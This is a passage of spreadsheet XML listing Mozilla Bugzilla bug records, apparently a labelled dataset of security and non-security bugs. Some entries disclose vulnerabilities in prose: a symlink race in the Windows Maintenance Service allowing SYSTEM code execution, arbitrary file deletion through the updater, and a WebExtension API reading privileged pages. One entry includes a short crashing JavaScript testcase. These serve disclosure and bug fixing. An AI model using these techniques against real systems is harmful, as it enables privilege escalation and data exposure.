      <c r="L5780" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5780" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5780" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5780" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5780" t="inlineStr"/>
      <c r="Q5780" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5780" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5780" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5780" t="n">
        <v>1</v>
      </c>
      <c r="U5780" t="n">
        <v>0</v>
      </c>
      <c r="V5780" t="n">
        <v>11</v>
      </c>
      <c r="W5780" t="inlineStr">
        <is>
          <t>ValidateBugID makes sure the ID is valid in a way that doesn't detaint it. 
ValidateBugID needs to trick_taint/detaint_natural the ID.</t>
        </is>
      </c>
      <c r="X5780" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5781">
      <c r="A5781" t="n">
        <v>1552206</v>
      </c>
      <c r="B5781" t="inlineStr">
        <is>
          <t>2019-05-16 08:27:52 -0700</t>
        </is>
      </c>
      <c r="C5781" t="inlineStr">
        <is>
          <t>Permissions overwrite via folder symlink TOCTOU by Maintenance Service</t>
        </is>
      </c>
      <c r="D5781" t="inlineStr">
        <is>
          <t>2024-05-30 09:59:33 -0700</t>
        </is>
      </c>
      <c r="E5781" t="n">
        <v>1</v>
      </c>
      <c r="F5781" t="n">
        <v>1</v>
      </c>
      <c r="G5781" t="n">
        <v>3</v>
      </c>
      <c r="H5781" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5781" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5781" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K5781" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5781" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5781" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5781" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5781" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5781" t="inlineStr">
        <is>
          <t>[fixed in bug 1551913][reporter-external] [client-bounty-form] [verif?][adv-main69+][adv-esr68.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5781" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5781" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5781" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T5781" t="n">
        <v>1</v>
      </c>
      <c r="U5781" t="n">
        <v>0</v>
      </c>
      <c r="V5781" t="n">
        <v>12</v>
      </c>
      <c r="W5781" t="inlineStr">
        <is>
          <t>Created attachment 9065440
proof-of-concept.zip
When running the Windows Mozilla Maintenace Service's fix-update-directory-perms command there is a race condition between the time when a directories attributes are checked for symlinks/junctions [0] to when the permissions on the file contents of the directory are actually changed [1].
By replacing a valid directory after the call to GetFileAttributesW() with a symlink to a target directory before the recursive call into SetPermissionsOfContent() the maintenance service will be tricked into granting Full Control for the Users group to all files/folders in the target directory.
If we use this to overwrite the permissions of the files in C:\Program Files (x86)\Mozilla Maintenance Service\ folder, we can replace the maintenance service itself with a binary we control and achieve arbitrary code execution as the SYSTEM user.
I've attached a proof of concept + binary which takes a folder path to overwrite the contents' permissions. It's pretty unreliable, but I did have success around the 350ms mark while also running a stress testing tool like Prime95 to slow the system down a bit. I tested this on version 68.0.0.7074 of the maintenanceservice.exe.
[0] - https://dxr.mozilla.org/mozilla-central/rev/cb5734727c0a9d88e3e236a3e4a741a051509e0e/toolkit/mozapps/update/common/commonupdatedir.cpp#1040
[1] - https://dxr.mozilla.org/mozilla-central/rev/cb5734727c0a9d88e3e236a3e4a741a051509e0e/toolkit/mozapps/update/common/commonupdatedir.cpp#1071</t>
        </is>
      </c>
      <c r="X5781" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5782">
      <c r="A5782" t="n">
        <v>755916</v>
      </c>
      <c r="B5782" t="inlineStr">
        <is>
          <t>2012-05-16 14:41:31 -0700</t>
        </is>
      </c>
      <c r="C5782" t="inlineStr">
        <is>
          <t>Assertion failure: enumerators == cx-&gt;enumerators,</t>
        </is>
      </c>
      <c r="D5782" t="inlineStr">
        <is>
          <t>2012-10-21 22:19:18 -0700</t>
        </is>
      </c>
      <c r="E5782" t="n">
        <v>1</v>
      </c>
      <c r="F5782" t="n">
        <v>1</v>
      </c>
      <c r="G5782" t="n">
        <v>3</v>
      </c>
      <c r="H5782" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5782" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5782" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5782" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5782" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5782" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5782" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5782" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5782" t="inlineStr">
        <is>
          <t>[sg:critical] [js:p1:fx15][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5782" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5782" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5782" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T5782" t="n">
        <v>1</v>
      </c>
      <c r="U5782" t="n">
        <v>0</v>
      </c>
      <c r="V5782" t="n">
        <v>9</v>
      </c>
      <c r="W5782" t="inlineStr">
        <is>
          <t>Created attachment 624548
stack
Object.defineProperty(this, "t2", {
    get: function() {
        for (p in h2) {
            t2
        }
    }
})
h2 = {}
mjitChunkLimit(8)
h2.a = function() {}
Object(t2)
asserts js 64-bit debug shell on m-c changeset 65fb8b9ea0b7 with -m and -n at Assertion failure: enumerators == cx-&gt;enumerators,
Asserts on Windows 7 but apparently not on Mac OS X 10.7.
Setting s-s because I'm not sure if this is sensitive, 64-bit js shell fuzzing on Windows 7 was only turned on recently.</t>
        </is>
      </c>
      <c r="X5782" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5783">
      <c r="A5783" t="n">
        <v>738251</v>
      </c>
      <c r="B5783" t="inlineStr">
        <is>
          <t>2012-03-22 07:43:48 -0700</t>
        </is>
      </c>
      <c r="C5783" t="inlineStr">
        <is>
          <t>Add SeaMonkey 2.9 Beta 1 to bouncer</t>
        </is>
      </c>
      <c r="D5783" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:56 -0700</t>
        </is>
      </c>
      <c r="E5783" t="n">
        <v>1</v>
      </c>
      <c r="F5783" t="n">
        <v>1</v>
      </c>
      <c r="G5783" t="n">
        <v>5</v>
      </c>
      <c r="H5783" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5783" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5783" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K5783" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5783" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5783" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5783" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5783" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5783" t="inlineStr"/>
      <c r="Q5783" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5783" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5783" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5783" t="n">
        <v>1</v>
      </c>
      <c r="U5783" t="n">
        <v>0</v>
      </c>
      <c r="V5783" t="n">
        <v>3</v>
      </c>
      <c r="W5783" t="inlineStr">
        <is>
          <t>The SeaMonkey team is going to release SeaMonkey 2.9 Beta 1 on Friday March 23, and we'd like to have the main builds added to bouncer for downloads.
There is a helper script at http://hg.mozilla.org/build/braindump/file/default/releases-related/add_seamonkey_to_bouncer.sh and you can edit the vars in the file to run it where VERSION=2.9b1 and OLDVER=2.8b6, or you can manually add the relevant snippets
The relevant URLs to add are (bouncer and FTP):
?product=seamonkey-2.9b1&amp;os=win
/seamonkey/releases/2.9b1/win32/:lang/SeaMonkey%20Setup%202.9b1.exe
?product=seamonkey-2.9b1&amp;os=linux
/seamonkey/releases/2.9b1/linux-i686/:lang/seamonkey-2.9b1.tar.bz2
?product=seamonkey-2.9b1&amp;os=osx
/seamonkey/releases/2.9b1/mac/:lang/SeaMonkey%202.9b1.dmg
?product=seamonkey-2.9b1-complete&amp;os=win
/seamonkey/releases/2.9b1/update/win32/:lang/seamonkey-2.9b1.complete.mar
?product=seamonkey-2.9b1-complete&amp;os=linux
/seamonkey/releases/2.9b1/update/linux-i686/:lang/seamonkey-2.9b1.complete.mar
?product=seamonkey-2.9b1-complete&amp;os=osx
/seamonkey/releases/2.9b1/update/mac/:lang/seamonkey-2.9b1.complete.mar
product=seamonkey-2.9b1-partial-2.8b6&amp;os=win
/seamonkey/releases/2.9b1/update/win32/:lang/seamonkey-2.8b6-2.9b1.partial.mar
?product=seamonkey-2.9b1-partial-2.8b6&amp;os=linux
/seamonkey/releases/2.9b1/update/linux-i686/:lang/seamonkey-2.8b6-2.9b1.partial.mar
?product=seamonkey-2.9b1-partial-2.8b6&amp;os=osx
/seamonkey/releases/2.9b1/update/mac/:lang/seamonkey-2.8b6-2.9b1.partial.mar
For now Bouncer monitors locale `tr` which will be in this release.</t>
        </is>
      </c>
      <c r="X5783" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5784">
      <c r="A5784" t="n">
        <v>805807</v>
      </c>
      <c r="B5784" t="inlineStr">
        <is>
          <t>2012-10-26 07:44:44 -0700</t>
        </is>
      </c>
      <c r="C5784" t="inlineStr">
        <is>
          <t>Filtering wrapper should filter setters when returning a property descriptor</t>
        </is>
      </c>
      <c r="D5784" t="inlineStr">
        <is>
          <t>2013-03-18 13:11:44 -0700</t>
        </is>
      </c>
      <c r="E5784" t="n">
        <v>1</v>
      </c>
      <c r="F5784" t="n">
        <v>1</v>
      </c>
      <c r="G5784" t="n">
        <v>3</v>
      </c>
      <c r="H5784" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5784" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5784" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K5784" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5784" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5784" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5784" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5784" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5784" t="inlineStr">
        <is>
          <t>[adv-track-main17+][adv-track-esr17+]</t>
        </is>
      </c>
      <c r="Q5784" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5784" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5784" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T5784" t="n">
        <v>1</v>
      </c>
      <c r="U5784" t="n">
        <v>0</v>
      </c>
      <c r="V5784" t="n">
        <v>35</v>
      </c>
      <c r="W5784" t="inlineStr">
        <is>
          <t>Filing this so that I have a bug number for the mochitest I'm about to write. I'll fill in the details once I'm sure this is a problem.</t>
        </is>
      </c>
      <c r="X5784" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5785">
      <c r="A5785" t="n">
        <v>488850</v>
      </c>
      <c r="B5785" t="inlineStr">
        <is>
          <t>2009-04-17 08:05:56 -0700</t>
        </is>
      </c>
      <c r="C5785" t="inlineStr">
        <is>
          <t>Crash [@ nsRootBoxFrame::RemoveFrame][@ nsFrame::Destroy][@@0x0 | nsFrameList::DestroyFrames()] with popup, menuitem and body onload removing window</t>
        </is>
      </c>
      <c r="D5785" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E5785" t="n">
        <v>1</v>
      </c>
      <c r="F5785" t="n">
        <v>1</v>
      </c>
      <c r="G5785" t="n">
        <v>3</v>
      </c>
      <c r="H5785" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5785" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5785" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K5785" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5785" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5785" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5785" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5785" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5785" t="inlineStr">
        <is>
          <t>[sg:critical?][3.6.x] deleted shell obj.</t>
        </is>
      </c>
      <c r="Q5785" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5785" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5785" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5785" t="n">
        <v>1</v>
      </c>
      <c r="U5785" t="n">
        <v>0</v>
      </c>
      <c r="V5785" t="n">
        <v>37</v>
      </c>
      <c r="W5785" t="inlineStr">
        <is>
          <t>Created attachment 373323
zipped up testcase
See zipped up testcase, to reproduce the crash:
Unzip the testcase, then open the file named 'parentframe.htm'.
It should crash after 500ms (after a reload).
It also crashes Firefox3.0.7, so marking security sensitive for now.
http://crash-stats.mozilla.com/report/index/049381bf-35dc-4616-a4d9-146bc2090417?p=1
0  	 	@0x0  	
1 	xul.dll 	nsRootBoxFrame::RemoveFrame 	layout/xul/base/src/nsRootBoxFrame.cpp:209
2 	xul.dll 	nsCSSFrameConstructor::ContentRemoved 	layout/base/nsCSSFrameConstructor.cpp:7234
3 	xul.dll 	PresShell::ContentRemoved 	layout/base/nsPresShell.cpp:4895
4 	xul.dll 	nsGenericElement::doRemoveChildAt 	content/base/src/nsGenericElement.cpp:3377
5 	xul.dll 	nsDocument::RemoveChildAt 	content/base/src/nsDocument.cpp:3252
6 	xul.dll 	nsGenericElement::doRemoveChild 	content/base/src/nsGenericElement.cpp:3984
7 	xul.dll 	nsDocument::RemoveChild 	content/base/src/nsDocument.cpp:5462
8 	xul.dll 	nsIDOMNode_RemoveChild 	obj-firefox/js/src/xpconnect/src/dom_quickstubs.cpp:4183
9 	js3250.dll 	js_Interpret 	js/src/jsinterp.cpp:5147
10 	js3250.dll 	js_Invoke 	js/src/jsinterp.cpp:1388
11 	js3250.dll 	js_InternalInvoke 	js/src/jsinterp.cpp:1441
12 	js3250.dll 	JS_CallFunctionValue 	js/src/jsapi.cpp:5196
13 	xul.dll 	nsJSContext::CallEventHandler 	dom/base/nsJSEnvironment.cpp:2007
14 	xul.dll 	nsJSEventListener::HandleEvent 	dom/src/events/nsJSEventListener.cpp:247
15 	xul.dll 	nsEventListenerManager::HandleEventSubType 	content/events/src/nsEventListenerManager.cpp:1090
16 	xul.dll 	nsEventListenerManager::HandleEvent 	content/events/src/nsEventListenerManager.cpp:1187
17 	xul.dll 	nsEventTargetChainItem::HandleEventTargetChain 	content/events/src/nsEventDispatcher.cpp:315
18 	xul.dll 	nsEventDispatcher::Dispatch 	content/events/src/nsEventDispatcher.cpp:508
19 	xul.dll 	nsImageBoxFrameEvent::Run 	layout/xul/base/src/nsImageBoxFrame.cpp:130
20 	xul.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:510
21 	xul.dll 	nsBaseAppShell::Run 	widget/src/xpwidgets/nsBaseAppShell.cpp:170
22 	xul.dll 	nsAppStartup::Run 	toolkit/components/startup/src/nsAppStartup.cpp:192
23 	nspr4.dll 	PR_GetEnv 	
24 	firefox.exe 	wmain 	toolkit/xre/nsWindowsWMain.cpp:110
25 	firefox.exe 	firefox.exe@0x21a7 	
26 	kernel32.dll 	BaseProcessStart 
Firefox3.0.7 has a different stacktrace:
http://crash-stats.mozilla.com/report/index/a1305891-19df-43f0-9aa4-8de482090417?p=1
0  	xul.dll  	nsFrame::Destroy  	 mozilla/layout/generic/nsFrame.cpp:500
1 	xul.dll 	nsFrameList::DestroyFrames 	mozilla/layout/generic/nsFrameList.cpp:67
2 	xul.dll 	nsContainerFrame::Destroy 	mozilla/layout/generic/nsContainerFrame.cpp:257
3 	xul.dll 	nsFrameList::DestroyFrames 	mozilla/layout/generic/nsFrameList.cpp:67
4 	xul.dll 	nsContainerFrame::Destroy 	mozilla/layout/generic/nsContainerFrame.cpp:257
5 	xul.dll 	nsFrameList::DestroyFrames 	mozilla/layout/generic/nsFrameList.cpp:67
6 	xul.dll 	nsContainerFrame::Destroy 	mozilla/layout/generic/nsContainerFrame.cpp:257
7 	xul.dll 	nsFrameList::DestroyFrames 	mozilla/layout/generic/nsFrameList.cpp:67
8 	xul.dll 	nsContainerFrame::Destroy 	mozilla/layout/generic/nsContainerFrame.cpp:257
9 	xul.dll 	nsFrameList::DestroyFrames 	mozilla/layout/generic/nsFrameList.cpp:67
10 	xul.dll 	nsContainerFrame::Destroy 	mozilla/layout/generic/nsContainerFrame.cpp:257
11 	xul.dll 	nsFrameList::DestroyFrames 	mozilla/layout/generic/nsFrameList.cpp:67
12 	xul.dll 	nsContainerFrame::Destroy 	mozilla/layout/generic/nsContainerFrame.cpp:257
13 	xul.dll 	nsLineBox::DeleteLineList 	mozilla/layout/generic/nsLineBox.cpp:340
14 	xul.dll 	nsBlockFrame::Destroy 	mozilla/layout/generic/nsBlockFrame.cpp:301
15 	xul.dll 	nsFrameList::DestroyFrames 	mozilla/layout/generic/nsFrameList.cpp:67
16 	xul.dll 	nsContainerFrame::Destroy 	mozilla/layout/generic/nsContainerFrame.cpp:257
17 	xul.dll 	nsBoxFrame::RemoveFrame 	mozilla/layout/xul/base/src/nsBoxFrame.cpp:1025
18 	xul.dll 	nsRootBoxFrame::RemoveFrame 	mozilla/layout/xul/base/src/nsRootBoxFrame.cpp:212
19 	xul.dll 	nsCSSFrameConstructor::ContentRemoved 	mozilla/layout/base/nsCSSFrameConstructor.cpp:9644
20 	xul.dll 	PresShell::ContentRemoved 	mozilla/layout/base/nsPresShell.cpp:4724
etc...</t>
        </is>
      </c>
      <c r="X5785" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5786">
      <c r="A5786" t="n">
        <v>1234401</v>
      </c>
      <c r="B5786" t="inlineStr">
        <is>
          <t>2015-12-21 16:23:11 -0800</t>
        </is>
      </c>
      <c r="C5786" t="inlineStr">
        <is>
          <t>Update logger can delete arbitrary files with the name "update.log"</t>
        </is>
      </c>
      <c r="D5786" t="inlineStr">
        <is>
          <t>2018-02-01 16:45:49 -0800</t>
        </is>
      </c>
      <c r="E5786" t="n">
        <v>1</v>
      </c>
      <c r="F5786" t="n">
        <v>1</v>
      </c>
      <c r="G5786" t="n">
        <v>3</v>
      </c>
      <c r="H5786" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5786" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5786" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K5786" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5786" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5786" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N5786" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5786" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5786" t="inlineStr">
        <is>
          <t>[adv-main55+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5786" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5786" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5786" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5786" t="n">
        <v>1</v>
      </c>
      <c r="U5786" t="n">
        <v>0</v>
      </c>
      <c r="V5786" t="n">
        <v>11</v>
      </c>
      <c r="W5786" t="inlineStr">
        <is>
          <t>On Windows, the update logging system's initialization procedure includes a step that deletes the file that it plans to write to. The name of this file is hard coded as "update.log", but the path to it is read from the command line. The updater can be invoked through the maintenance service, so anyone able to execute that with the right command line can cause any file with the name update.log anywhere on the system to be deleted, using the very high privilege level that the service gets invoked at.</t>
        </is>
      </c>
      <c r="X5786" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5787">
      <c r="A5787" t="n">
        <v>1379895</v>
      </c>
      <c r="B5787" t="inlineStr">
        <is>
          <t>2017-07-11 00:01:43 -0700</t>
        </is>
      </c>
      <c r="C5787" t="inlineStr">
        <is>
          <t>stylo: Crash in mozalloc_abort | abort | core::result::unwrap_failed&lt;T&gt; | style::properties::longhands::system_font::{{impl}}::to_computed_value</t>
        </is>
      </c>
      <c r="D5787" t="inlineStr">
        <is>
          <t>2017-08-03 03:40:01 -0700</t>
        </is>
      </c>
      <c r="E5787" t="n">
        <v>1</v>
      </c>
      <c r="F5787" t="n">
        <v>1</v>
      </c>
      <c r="G5787" t="n">
        <v>3</v>
      </c>
      <c r="H5787" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5787" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5787" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K5787" t="inlineStr">
        <is>
          <t>54 Branch</t>
        </is>
      </c>
      <c r="L5787" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5787" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5787" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5787" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5787" t="inlineStr"/>
      <c r="Q5787" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5787" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5787" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T5787" t="n">
        <v>1</v>
      </c>
      <c r="U5787" t="n">
        <v>0</v>
      </c>
      <c r="V5787" t="n">
        <v>10</v>
      </c>
      <c r="W5787" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-6bf9bef3-8cb6-448f-85ca-bf4940170709.
=============================================================
1 crash in Nightly 56</t>
        </is>
      </c>
      <c r="X5787" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5788">
      <c r="A5788" t="n">
        <v>1408194</v>
      </c>
      <c r="B5788" t="inlineStr">
        <is>
          <t>2017-10-12 15:48:22 -0700</t>
        </is>
      </c>
      <c r="C5788" t="inlineStr">
        <is>
          <t>WebExtension Find API can search privileged pages</t>
        </is>
      </c>
      <c r="D5788" t="inlineStr">
        <is>
          <t>2018-08-28 22:56:19 -0700</t>
        </is>
      </c>
      <c r="E5788" t="n">
        <v>1</v>
      </c>
      <c r="F5788" t="n">
        <v>1</v>
      </c>
      <c r="G5788" t="n">
        <v>3</v>
      </c>
      <c r="H5788" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5788" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J5788" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5788" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5788" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5788" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5788" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5788" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5788" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main59+]</t>
        </is>
      </c>
      <c r="Q5788" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5788" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5788" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T5788" t="n">
        <v>1</v>
      </c>
      <c r="U5788" t="n">
        <v>0</v>
      </c>
      <c r="V5788" t="n">
        <v>20</v>
      </c>
      <c r="W5788" t="inlineStr">
        <is>
          <t>The Find API allows you to search across privileged pages. This means you could see whats on about:debugging by searching for that string, if the user has that page open.
It doesn't seem to work on about:config, that seems to be more because of how about:config works than anything else.
You can't search for regex, all you can really do is search for the presence of a string on a tab. But at some point I'm sure someone will file a bug searching for regex and someone might redesign about:config and suddenly you can read any pref.
For future proofing I'd like to recommend that we explicitly prevent this API from searching any about: page to prevent something accidentally leaking in the future.</t>
        </is>
      </c>
      <c r="X5788" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5789">
      <c r="A5789" t="n">
        <v>1429260</v>
      </c>
      <c r="B5789" t="inlineStr">
        <is>
          <t>2018-01-09 17:04:38 -0800</t>
        </is>
      </c>
      <c r="C5789" t="inlineStr">
        <is>
          <t>Handle request changes with updateWith - verify that state stays consistent</t>
        </is>
      </c>
      <c r="D5789" t="inlineStr">
        <is>
          <t>2018-06-26 08:52:17 -0700</t>
        </is>
      </c>
      <c r="E5789" t="n">
        <v>1</v>
      </c>
      <c r="F5789" t="n">
        <v>1</v>
      </c>
      <c r="G5789" t="n">
        <v>2</v>
      </c>
      <c r="H5789" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5789" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5789" t="inlineStr">
        <is>
          <t>WebPayments UI</t>
        </is>
      </c>
      <c r="K5789" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5789" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5789" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5789" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5789" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5789" t="inlineStr">
        <is>
          <t>[webpayments]</t>
        </is>
      </c>
      <c r="Q5789" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5789" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5789" t="inlineStr">
        <is>
          <t>Firefox 62</t>
        </is>
      </c>
      <c r="T5789" t="n">
        <v>1</v>
      </c>
      <c r="U5789" t="n">
        <v>0</v>
      </c>
      <c r="V5789" t="n">
        <v>14</v>
      </c>
      <c r="W5789" t="inlineStr">
        <is>
          <t>This bug tracks auditing the dialog behaviour to ensure that dialog state remains consistent when the Payment Request is changed.
Bug 1429190 is one example where there could be a problem but there are possibly others.</t>
        </is>
      </c>
      <c r="X5789" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5790">
      <c r="A5790" t="n">
        <v>719393</v>
      </c>
      <c r="B5790" t="inlineStr">
        <is>
          <t>2012-01-19 04:18:03 -0800</t>
        </is>
      </c>
      <c r="C5790" t="inlineStr">
        <is>
          <t>Remove "as" from 10.0b3 update verify configs</t>
        </is>
      </c>
      <c r="D5790" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5790" t="n">
        <v>1</v>
      </c>
      <c r="F5790" t="n">
        <v>1</v>
      </c>
      <c r="G5790" t="n">
        <v>5</v>
      </c>
      <c r="H5790" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5790" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5790" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5790" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5790" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5790" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5790" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5790" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
